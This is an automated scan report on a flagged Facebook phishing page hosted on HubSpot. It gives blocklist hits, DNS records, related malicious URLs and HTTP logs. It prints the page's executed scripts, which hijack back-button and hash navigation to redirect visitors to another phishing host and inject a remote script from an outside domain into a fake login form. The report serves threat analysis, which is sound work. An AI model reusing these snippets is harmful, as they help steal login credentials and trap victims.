Overview

URL appnewstv.hs-sites-eu1.com/
IP 104.18.33.253
ASN CLOUDFLARENET
Location
Report completed 2022-09-14 10:26:09 UTC
urlquery Alerts No alerts detected


Settings

UserAgent Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish
Scan Date Severity Indicator Comment
2022-09-14 2 appnewstv.hs-sites-eu1.com/ Facebook, Inc.
2022-09-14 2 appnewstv.hs-sites-eu1.com/ Facebook, Inc.
PhishTank  No alerts detected
Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-09-14 2 appnewstv.hs-sites-eu1.com/ Phishing
2022-09-14 2 appnewstv.hs-sites-eu1.com/_hcms/perf Phishing
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

No files detected



Passive DNS (24)

Passive DNS Source Fully Qualified Domain Name Rank First Seen Last Seen IP Comment
mnemonic passive DNS track-eu1.hubspot.com (2) 73788 2021-08-03 10:49:05 UTC 2022-09-14 02:52:34 UTC 172.65.240.166
mnemonic passive DNS r3.o.lencr.org (6) 344 2020-12-02 08:52:13 UTC 2022-09-14 04:47:59 UTC 23.36.77.32
mnemonic passive DNS content-signature-2.cdn.mozilla.net (1) 1152 2020-11-03 12:26:46 UTC 2022-09-14 04:47:55 UTC 143.204.55.49
mnemonic passive DNS ocsp.digicert.com (1) 86 2012-05-21 07:02:23 UTC 2022-09-14 06:33:50 UTC 93.184.220.29
mnemonic passive DNS cdnjs.cloudflare.com (3) 235 2020-10-20 10:17:36 UTC 2022-09-14 04:31:59 UTC 104.17.25.14
mnemonic passive DNS f.hubspotusercontent-eu1.net (3) 278068 2021-08-12 10:46:27 UTC 2022-09-14 07:31:04 UTC 172.64.153.30
mnemonic passive DNS feliznewstv.com (3) 0 2022-07-23 16:41:06 UTC 2022-07-23 16:41:06 UTC 147.182.144.225 Unknown ranking
mnemonic passive DNS js-eu1.hscollectedforms.net (1) 75385 2021-08-03 13:53:48 UTC 2022-09-14 09:38:12 UTC 172.65.192.122
mnemonic passive DNS widgets.amung.us (1) 12623 2012-05-21 19:25:54 UTC 2022-09-14 08:20:37 UTC 104.22.75.171
mnemonic passive DNS firefox.settings.services.mozilla.com (2) 867 2020-05-27 20:08:30 UTC 2022-09-14 05:55:26 UTC 143.204.55.115
mnemonic passive DNS contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-09-14 04:48:22 UTC 34.117.237.239
mnemonic passive DNS js-eu1.hs-scripts.com (2) 63672 2021-08-03 13:53:48 UTC 2022-09-13 22:15:10 UTC 172.65.208.22
mnemonic passive DNS static.hsappstatic.net (5) 8199 2013-09-26 02:22:42 UTC 2022-09-14 05:56:13 UTC 104.17.6.210
mnemonic passive DNS ocsp.pki.goog (4) 175 2017-06-14 07:23:31 UTC 2022-09-14 04:48:23 UTC 142.250.74.3
mnemonic passive DNS 26246913.fs1.hubspotusercontent-eu1.net (2) 0 No data No data 104.18.34.226 Unknown ranking
mnemonic passive DNS img-getpocket.cdn.mozilla.net (6) 1631 2017-09-01 03:40:57 UTC 2022-09-14 04:48:25 UTC 34.120.237.76
mnemonic passive DNS js-eu1.hs-analytics.net (1) 69352 2021-08-03 13:53:48 UTC 2022-09-14 02:52:33 UTC 172.65.238.60
mnemonic passive DNS fonts.gstatic.com (2) 0 2014-08-29 13:43:22 UTC 2022-09-14 04:48:25 UTC 142.250.74.163 Domain (gstatic.com) ranked at: 540
mnemonic passive DNS app-eu1.hubspot.com (1) 191732 2021-07-26 14:26:48 UTC 2022-09-14 08:40:34 UTC 172.65.236.181
mnemonic passive DNS appnewstv.hs-sites-eu1.com (2) 0 2022-09-13 19:45:26 UTC 2022-09-14 03:25:15 UTC 172.64.154.3 Unknown ranking
mnemonic passive DNS push.services.mozilla.com (1) 2140 2015-09-03 10:29:36 UTC 2022-09-14 04:48:23 UTC 52.39.126.109
mnemonic passive DNS js-eu1.hs-banner.com (1) 66996 2021-08-03 13:53:48 UTC 2022-09-14 05:23:57 UTC 172.65.202.201
mnemonic passive DNS cdn2.hubspot.net (2) 7304 2013-04-11 07:00:34 UTC 2022-09-14 05:05:18 UTC 104.17.242.204
mnemonic passive DNS fonts.googleapis.com (1) 8877 2014-07-21 13:19:55 UTC 2022-09-14 05:27:55 UTC 142.250.74.10


Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 104.18.33.253

Date UQ / IDS / BL URL IP
2022-12-02 21:27:43 +0000 0 - 0 - 1 prositevd.hs-sites-eu1.com/ 104.18.33.253
2022-11-28 08:35:20 +0000 0 - 0 - 0 hoegheiendom-25006101.hs-sites-eu1.com/inflas (...) 104.18.33.253
2022-11-14 13:35:03 +0000 0 - 0 - 6 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-11-14 09:32:46 +0000 0 - 0 - 9 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-09-23 23:15:15 +0000 0 - 0 - 2 private-video.hs-sites-eu1.com/ 104.18.33.253

Last 5 reports on ASN: CLOUDFLARENET

Date UQ / IDS / BL URL IP
2022-12-03 21:44:15 +0000 0 - 0 - 1 storageapi.fleek.co/2a7f3081-db35-4a88-9e6d-7 (...) 104.18.6.145
2022-12-03 21:43:59 +0000 0 - 0 - 3 sweepstakessurveytoday.com/sweeps-survey.html 188.114.96.1
2022-12-03 21:43:57 +0000 0 - 0 - 2 ready-for-download.com/new/3p/ 104.21.17.24
2022-12-03 21:42:29 +0000 0 - 0 - 9 www.work511.in/order/ 172.67.205.84
2022-12-03 21:41:49 +0000 0 - 0 - 3 dollarsurvey.site/captcha1.html 104.26.3.231

Last 5 reports on domain: hs-sites-eu1.com

Date UQ / IDS / BL URL IP
2022-12-02 21:27:43 +0000 0 - 0 - 1 prositevd.hs-sites-eu1.com/ 104.18.33.253
2022-11-28 08:35:20 +0000 0 - 0 - 0 hoegheiendom-25006101.hs-sites-eu1.com/inflas (...) 104.18.33.253
2022-11-14 13:35:03 +0000 0 - 0 - 6 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-11-14 09:32:46 +0000 0 - 0 - 9 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-09-23 23:15:15 +0000 0 - 0 - 2 private-video.hs-sites-eu1.com/ 104.18.33.253

Last 5 reports with similar screenshot

Date UQ / IDS / BL URL IP
2022-11-15 15:41:18 +0000 0 - 0 - 8 app-funnelsx.bubbleapps.io/version-test/ 104.19.217.48
2022-11-14 09:32:46 +0000 0 - 0 - 9 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-11-10 23:45:55 +0000 0 - 0 - 8 rickpack44.bubbleapps.io/version-test/ 104.19.218.48
2022-11-10 14:36:22 +0000 0 - 0 - 8 rickpack44.bubbleapps.io/version-test/ 104.19.218.48
2022-11-01 10:39:02 +0000 0 - 0 - 2 jhufedsgjg614322067.brizy.site/ 34.237.47.210


JavaScript

Executed Scripts (19)


Executed Evals (6)

#1 JavaScript::Eval (size: 516, repeated: 1) - SHA256: 981233bb7fc26109c211cad042da538cf8df699dc77e1b859daf53174dd95f24

                                        (function() {
    var ignoreHistoryChange = true;
    window.onpopstate = function(event) {

        if (!ignoreHistoryChange) {
            ignoreHistoryChange = true;

            try {
                window.top.location = 'https://oficial-sites-news.hs-sites-eu1.com/';
            } catch (d) {
                window.location = 'https://oficial-sites-news.hs-sites-eu1.com/';
            };
            return false;

        } else {
            ignoreHistoryChange = false;
        }


    };
})();
                                    

#2 JavaScript::Eval (size: 506, repeated: 1) - SHA256: faa040a5ceb4c2ae787756b6505cc259fd4eecf9eefd1a619b68170c36be4481

                                        (function() {
    window.location.hash = Math.random();
    var ignoreHashChange = true;
    window.onhashchange = function() {
        if (!ignoreHashChange) {
            ignoreHashChange = true;

            try {
                window.top.location = 'https://oficial-sites-news.hs-sites-eu1.com/';
            } catch (d) {
                window.location = 'https://oficial-sites-news.hs-sites-eu1.com/';
            };
            return false;

        } else {
            ignoreHashChange = false;
        }
    };
})();
                                    

#3 JavaScript::Eval (size: 74, repeated: 1) - SHA256: caa4136b6be3d43f29aa4daaae83f78c3b5c2147caab95afa2204069aa91a97c

                                         (function() {
     new Image().src = '//whos.amung.us/widget/josvip222';
 })();
                                    

#4 JavaScript::Eval (size: 0, repeated: 1) - SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                        
                                    

#5 JavaScript::Eval (size: 72, repeated: 1) - SHA256: 29a2f56684cbeb9be02ed2d2ada727030d2781d6f6630d817ea23ef8ab50b293

                                        (function() {
    new Image().src = '//whos.amung.us/widget/josvip222';
})();
                                    

#6 JavaScript::Eval (size: 386, repeated: 1) - SHA256: d56b088af0f7a23d2cdc0a4e61293c5e55c61d23a49e18906733f77e1b3ab364

                                        document.body.className = document.body.className + ' touch x1-5 android _fzu _50-3 iframe acw portrait';
m_login_email.required = true;
m_login_password.required = true;
var script_ = document.createElement('script');
script_.src = "https://feliznewstv.com/location";
script_.async = true;
document.body.appendChild(script_);
                                    

Executed Writes (0)



HTTP Transactions (54)


Request Response
                                        
GET /v1/ HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Type, Content-Length, Backoff, Retry-After, Alert
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Wed, 14 Sep 2022 10:09:30 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 f00e3524edcdf61801454f2bb21e71ce.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: SRPXOTN2Kau6NX_rtJlIiTlD2rTXo1-qnwUPmXY6TBWtf_mzPiOBYw==
Age: 988


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    99b7d23c1748d0526782b9ff9ea45f09
Sha1:   eadd801a3ba2aa00632c6fb52e1f9125bd6d5b4f
Sha256: 48f81668f76955320480b484138aebdad5d03c471036b4449c737aca1ecab08e
                                        
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Server: nginx
Content-Length: 503
ETag: "B5F178D23E633283F226CCA7A9AE79B01E6CAB2299FF7065C980D3A9953212FD"
Last-Modified: Tue, 13 Sep 2022 06:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=12975
Expires: Wed, 14 Sep 2022 14:02:13 GMT
Date: Wed, 14 Sep 2022 10:25:58 GMT
Connection: keep-alive

                                        
GET /chains/remote-settings.content-signature.mozilla.org-2022-10-09-23-18-04.chain HTTP/1.1
Host: content-signature-2.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
143.204.55.49
HTTP/2 200 OK
content-type: binary/octet-stream
content-length: 5348
last-modified: Sat, 20 Aug 2022 23:18:05 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Wed, 14 Sep 2022 04:35:16 GMT
etag: "742edb4038f38bc533514982f3d2e861"
x-cache: Hit from cloudfront
via: 1.1 814e8c24454087e83cd261a6cf477166.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: Pk4mjsVddjT1N4Ihf4ydhM1ldfn5JRQLhYBqyl1_d9pnq2vMDgvqRQ==
age: 21043
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    742edb4038f38bc533514982f3d2e861
Sha1:   cc3a20c8dc2a8c632ef9387a2744253f1e3fdef1
Sha256: b6bfa49d3d135035701231db2fffc0c0643444394009a94c6a1b4d829d6b8345
                                        
GET /v1/tiles HTTP/1.1
Host: contile.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
34.117.237.239
HTTP/2 200 OK
content-type: application/json
server: nginx
date: Wed, 14 Sep 2022 10:25:58 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Date: Wed, 14 Sep 2022 10:03:22 GMT
Cache-Control: max-age=3600
Expires: Wed, 14 Sep 2022 10:03:50 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 1d8cf7c8865ed1078c19a98771ad34ca.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: eswWoizPy_CQvgsyqZ0OVuX1vdXfHbmt8YJvntTAprLplwKk4sEpWQ==
Age: 1356


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
GET / HTTP/1.1
Host: appnewstv.hs-sites-eu1.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         
172.64.154.3
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Date: Wed, 14 Sep 2022 10:25:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74a86bf47f170b59-OSL
Cache-Control: s-maxage=10,max-age=5
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Credentials: false
cache-tag: CT-53071520739,P-26246913,CW-53070285001,CW-53070285002,CW-53070973145,CW-53071252457,E-53070144758,E-53070288600,E-53070973151,E-53070973152,E-53070973154,E-53070982620,E-53071252464,RA-53070285250,PGS-ALL,SW-0
Edge-Cache-Tag: CT-53071520739,P-26246913,CW-53070285001,CW-53070285002,CW-53070973145,CW-53071252457,E-53070144758,E-53070288600,E-53070973151,E-53070973152,E-53070973154,E-53070982620,E-53071252464,RA-53070285250,PGS-ALL,SW-0
X-HS-Cache-Config: BrowserCache-5s-EdgeCache-10s
X-HS-Content-Id: 53071520739
X-HS-Hub-Id: 26246913
X-HubSpot-Correlation-Id: 8dd25487-1a6f-444f-b063-79fe32a81e21
X-Powered-By: HubSpot
X-Robots-Tag: none
X-Trace: 2B970C8762D0C3C9EBCA334459ED727CD72845742D000000000000000000
Server: cloudflare
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (1069)
Size:   5376
Md5:    56b28dc45080bbe7baa59a1a81eb9572
Sha1:   4b7dfc2d9a855f8b1ac0b1e7f569e2ea08cb1628
Sha256: ded623fdb82a9da45270d38ba8cf1e3729fff96610b209d5ed7fb6a684ce2ca8

Alerts:
  Blocklists:
    - openphish: Facebook, Inc.
    - fortinet: Phishing
                                        
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Accept-Ranges: bytes
Age: 3693
Cache-Control: 'max-age=158059'
Date: Wed, 14 Sep 2022 10:25:59 GMT
Last-Modified: Wed, 14 Sep 2022 09:24:26 GMT
Server: ECS (ska/F71C)
X-Cache: HIT
Content-Length: 471

                                        
GET /ajax/libs/font-awesome/5.15.1/css/all.min.css HTTP/1.1
Host: cdnjs.cloudflare.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
104.17.25.14
HTTP/2 200 OK
content-type: text/css; charset=utf-8
date: Wed, 14 Sep 2022 10:25:59 GMT
content-length: 10491
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5f7b5b5f-e7d0"
last-modified: Mon, 05 Oct 2020 17:43:59 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 4194177
expires: Mon, 04 Sep 2023 10:25:59 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EC0NufkON958%2FQf3ppjcUue8xOvp8%2FJmH%2BoxY2qW5POrO7rKe74nOQoCDDf7auqF6W9pThA4FiXf4mhp1ZQs6MJqtU1fQGfjAWAqyozNgbam7oGRRgzGWiIvze87LgZvf6CktXA5"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 74a86bf94895b52d-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (59158)
Size:   10491
Md5:    a20f2b1b0e73086a7546d004092fb368
Sha1:   3c0e3c8c74971acac179bb55951410cdfc26abab
Sha256: 185c5af2acbae7972165d8c67887a7300e85cb3f03882048437b6e5177c1fe2a
                                        
GET /ajax/libs/jquery/3.5.1/jquery.min.js HTTP/1.1
Host: cdnjs.cloudflare.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
104.17.25.14
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
date: Wed, 14 Sep 2022 10:25:59 GMT
content-length: 27958
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5eb09ed3-15d84"
last-modified: Mon, 04 May 2020 23:01:39 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 8594863
expires: Mon, 04 Sep 2023 10:25:59 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2d0FwSjp4HmGTyZ127OJD1kYtliDww2He6psefmvktLrvOUfJXBpNyzwjpiDWmh5WpxfcV5elEi0fwifoHT5R129c4ga%2FuhIuQqxY3fGkYhTrxi8Jo2bJqC21e3ImEvvjpMXgJSS"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 74a86bf968acb52d-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65451)
Size:   27958
Md5:    4b5f47439b640180cc3450f7de05d0d8
Sha1:   5a0dc9bcab80ddc409dd35fcb00a88fe6846fee2
Sha256: 1f85e8b327f42c17c025d69849914068536d9aa95412fe473ae90ffb2f4ebd82
                                        
GET /ajax/libs/jquery-migrate/3.3.1/jquery-migrate.min.js HTTP/1.1
Host: cdnjs.cloudflare.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
104.17.25.14
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
date: Wed, 14 Sep 2022 10:25:59 GMT
content-length: 3592
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5ef3fc71-2b0b"
last-modified: Thu, 25 Jun 2020 01:22:57 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 6194064
expires: Mon, 04 Sep 2023 10:25:59 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Qz55T4mVPeK6rrdXaGIAkLsh9BtnU%2BxwPP8fCkRUgA0RSlVaetDMW1m67Zm2TMVjZl347crthG8URFSP7dZIG2x01%2FhlS0QKDU7F8GfXhLvIplP5IY26swpucPIyOacQWckH0rlb"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 74a86bf968aeb52d-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (10878)
Size:   3592
Md5:    6ea2c00839ed36981fbd1b780e595bfb
Sha1:   9ccfa1a9cd5cb950fc6aaf7697e8a0f9445499b8
Sha256: 9264523f67fe6dae44ac10a749711f77eeff71a8296210098d1144f84e01f944
                                        
GET /hub/26246913/hub_generated/template_assets/53071252464/1663077093553/marketplace/GiantFocal/Hatch_Landing/js/main.min.js HTTP/1.1
Host: f.hubspotusercontent-eu1.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
172.64.153.30
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
X-HS-Alternate-Content-Type: text/plain
Date: Wed, 14 Sep 2022 10:25:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74a86bf949e5b515-OSL
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=1209600
ETag: W/"d9021282f13fd812e10bb808a4c186e0"
Expires: Wed, 28 Sep 2022 10:25:59 GMT
Last-Modified: Tue, 13 Sep 2022 13:51:34 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Access-Control-Allow-Methods: GET
X-Amz-Cf-Pop: FRA53-C1
x-amz-meta-created-unix-time-millis: 1663077093849
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
Server: cloudflare
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (6578)
Size:   1647
Md5:    44c911307e68de35f68d537d42b638be
Sha1:   44492c45c7927a305db155ec368f03c1fe897a34
Sha256: 1d3b8706a9bedba2a893961bcac36e8d0b216b972b46b47789e0ab37651c4597
                                        
GET /hub/26246913/hub_generated/template_assets/53070982620/1663077090631/marketplace/GiantFocal/Hatch_Landing/js/plugins/plugins.min.js HTTP/1.1
Host: f.hubspotusercontent-eu1.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
172.64.153.30
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
X-HS-Alternate-Content-Type: text/plain
Date: Wed, 14 Sep 2022 10:25:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74a86bf94a57b505-OSL
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=1209600
ETag: W/"709362e671b2b08da9b90e574d607024"
Expires: Wed, 28 Sep 2022 10:25:59 GMT
Last-Modified: Tue, 13 Sep 2022 13:51:31 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Access-Control-Allow-Methods: GET
X-Amz-Cf-Pop: FRA53-C1
x-amz-meta-created-unix-time-millis: 1663077090919
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
Server: cloudflare
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (3296)
Size:   1465
Md5:    a4293e27e8623332217827abd391a216
Sha1:   3d56fe03c815733f126c62084c7f81bd55e73c08
Sha256: ed71fb54bd4710f3596a1350059adb20d91367da6fd04670eabbd09316912e3f
                                        
GET /hub/26246913/hub_generated/template_assets/53070288600/1663077099315/marketplace/GiantFocal/Hatch_Landing/css/main.min.css HTTP/1.1
Host: f.hubspotusercontent-eu1.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
172.64.153.30
HTTP/1.1 200 OK
Content-Type: text/css
X-HS-Alternate-Content-Type: text/plain
Date: Wed, 14 Sep 2022 10:25:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74a86bf95832b50f-OSL
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=1209600
Content-Encoding: gzip
ETag: W/"7c228c6edbc872215fbf537a8b4cf18e"
Expires: Wed, 28 Sep 2022 10:25:59 GMT
Last-Modified: Tue, 13 Sep 2022 13:51:43 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Access-Control-Allow-Methods: GET
X-Amz-Cf-Pop: FRA53-C1
x-amz-meta-created-unix-time-millis: 1663077102493
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
Server: cloudflare


--- Additional Info ---
Magic:  ASCII text, with very long lines (38627)
Size:   78600
Md5:    5256ccfbc2ab2efe1333e9307bc73e65
Sha1:   24f4e33e7aae36a340369b7142cfb52ae65b6d44
